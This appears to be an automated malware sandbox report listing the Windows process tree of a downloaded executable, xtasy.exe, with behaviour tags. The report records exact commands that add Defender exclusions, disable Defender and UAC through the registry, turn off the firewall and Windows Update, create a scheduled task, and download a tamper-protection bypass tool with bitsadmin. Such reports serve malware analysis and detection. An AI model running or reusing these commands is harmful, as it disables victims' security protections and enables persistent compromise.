C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffb9af546f8,0x7ffb9af54708,0x7ffb9af547182⤵PID:732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:22⤵PID:2784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:5032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:82⤵PID:3464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:12⤵PID:1880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:12⤵PID:2012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:12⤵PID:2776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:82⤵PID:3252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings2⤵
- Drops file in Program Files directory
PID:4156 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff76bce5460,0x7ff76bce5470,0x7ff76bce54803⤵PID:4572
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:12⤵PID:1412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5968 /prefetch:82⤵PID:3272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:12⤵PID:4232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4860 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6560 /prefetch:82⤵PID:4976
-
-
C:\Users\Admin\Downloads\xtasy.exe"C:\Users\Admin\Downloads\xtasy.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- UAC bypass
- Disables RegEdit via registry modification
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\xtasy.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'xtasy.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ .exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess ' .exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5964
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn " " /tr "C:\ProgramData\ .exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:5940
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:4376
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:3040
-
C:\Windows\system32\SecurityHealthSystray.exeSecurityHealthSystray4⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5192
-
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵PID:2772
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller3⤵PID:3536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ymwebk.bat" "3⤵PID:4276
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"4⤵PID:3116
-
-
C:\Windows\system32\wscript.exewscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs4⤵PID:3032
-
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe4⤵
- Download via BitsAdmin
PID:5552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""4⤵
- Command and Scripting Interpreter: PowerShell
PID:4320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"4⤵
- Command and Scripting Interpreter: PowerShell
PID:5840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force4⤵
- UAC bypass
PID:2900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"4⤵
- Command and Scripting Interpreter: PowerShell
PID:4308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"4⤵
- Command and Scripting Interpreter: PowerShell
PID:420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"4⤵
- Command and Scripting Interpreter: PowerShell
PID:4520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"4⤵
- Command and Scripting Interpreter: PowerShell
PID:5564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jadove.bat" "3⤵PID:5508
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3780
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵PID:1952
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵PID:4812
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f4⤵PID:4008
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵PID:2152
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1320
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\dvpwid.ps1"3⤵
- Modifies security service
- Command and Scripting Interpreter: PowerShell
- Modifies Security services
PID:1528 -
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe"4⤵PID:5260
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe"4⤵PID:2628
-
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4308
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" stop wuauserv3⤵
- Launches sc.exe
PID:4512
-
-
C:\Windows\System32\sc.exe"C:\Windows\System32\sc.exe" config wuauserv start=disabled3⤵
- Launches sc.exe
PID:5168
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eaxdse.bat" "3⤵PID:6408
-
C:\Windows\system32\reg.exereg add hklm\software\policies\microsoft\windows\photosolder\photostore /v disablecamlight /t reg_dword /d 14⤵
- Modifies registry key
PID:6468
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3056
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:348
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:420
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender notification settings
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:864 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:5648
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:5300
-
C:\Windows\system32\SecurityHealthSystray.exeSecurityHealthSystray4⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5364
-
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵PID:5412
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵PID:5632
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
PID:5628
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -DisableService3⤵
- Suspicious use of SetWindowsHookEx
PID:2552
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3364
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3728
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵PID:6016
-
C:\Windows\System32\cleanmgr.exe"C:\Windows\System32\cleanmgr.exe" /D C1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
PID:2012 -
C:\Users\Admin\AppData\Local\Temp\FF9852EF-B07B-46A0-89BD-15152433BB82\dismhost.exeC:\Users\Admin\AppData\Local\Temp\FF9852EF-B07B-46A0-89BD-15152433BB82\dismhost.exe {3AFEA4D4-D9E8-409E-AD4B-E893B8C97A60}2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:3040
-
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
PID:5404
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵PID:5484
-
C:\Windows\system32\Taskmgr.exe"C:\Windows\system32\Taskmgr.exe"2⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
PID:3340
-
-
C:\Windows\system32\Taskmgr.exe"C:\Windows\system32\Taskmgr.exe"2⤵PID:2276
-
-
C:\Windows\regedit.exe"C:\Windows\regedit.exe"1⤵
- Runs regedit.exe
PID:4680
-
C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe"C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:5016
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:2540
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:916
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:5552
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:5744
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {3522D7AF-4617-4237-AAD8-5860231FC9BA} -Embedding1⤵PID:2340
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:5976
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:3868
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:2232
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:5284
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:4704
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:6020
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:5528
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:5728
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:4984
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:5080
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:4640
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:5168
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:2572
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:5048
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:4628
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:2220
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:2480
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:1288
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:4376
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:5404
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:2016
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:3572
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:5312
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:232
-
C:\Windows\System32\SecurityHealthHost.exeC:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding1⤵PID:3240
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WindowsBackupClient.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WindowsBackupClient.exe" -ServerName:WindowsBackup.AppX7g7ckthmr138zk16nhs1hb5tyevsa9p6.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3516
-
C:\Windows\System32\oobe\UserOOBEBroker.exeC:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding1⤵
- Drops file in Windows directory
PID:1140
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding1⤵
- System Location Discovery: System Language Discovery
PID:5272
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding1⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6716 -
C:\Windows\SysWOW64\unregmp2.exe"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon2⤵
- System Location Discovery: System Language Discovery
PID:6756 -
C:\Windows\system32\unregmp2.exe"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT3⤵
- Enumerates connected drives
PID:6800
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 31682⤵
- Program crash
PID:1960
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost1⤵
- Drops file in Windows directory
PID:7128
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x498 0x4601⤵PID:2088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6716 -ip 67161⤵PID:4672
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding1⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4384
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:412
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5556 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1956 -parentBuildID 20240401114208 -prefsHandle 1884 -prefMapHandle 1864 -prefsLen 23761 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf719cb4-c17d-438c-96b9-6a1393bf4449} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" gpu3⤵PID:396
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2356 -parentBuildID 20240401114208 -prefsHandle 2348 -prefMapHandle 2344 -prefsLen 23639 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e493534c-8324-49b8-9ddd-0716e2d03d6e} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" socket3⤵
- Checks processor information in registry
PID:2732
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3040 -childID 1 -isForBrowser -prefsHandle 3044 -prefMapHandle 2968 -prefsLen 22590 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {88ee182b-f2e1-4d58-8c9c-49cc9085ea89} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" tab3⤵PID:6240
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4256 -childID 2 -isForBrowser -prefsHandle 4160 -prefMapHandle 4156 -prefsLen 29013 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cff0ec1e-b676-4c3d-86c3-7a696a4099f9} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" tab3⤵PID:4768
-
-
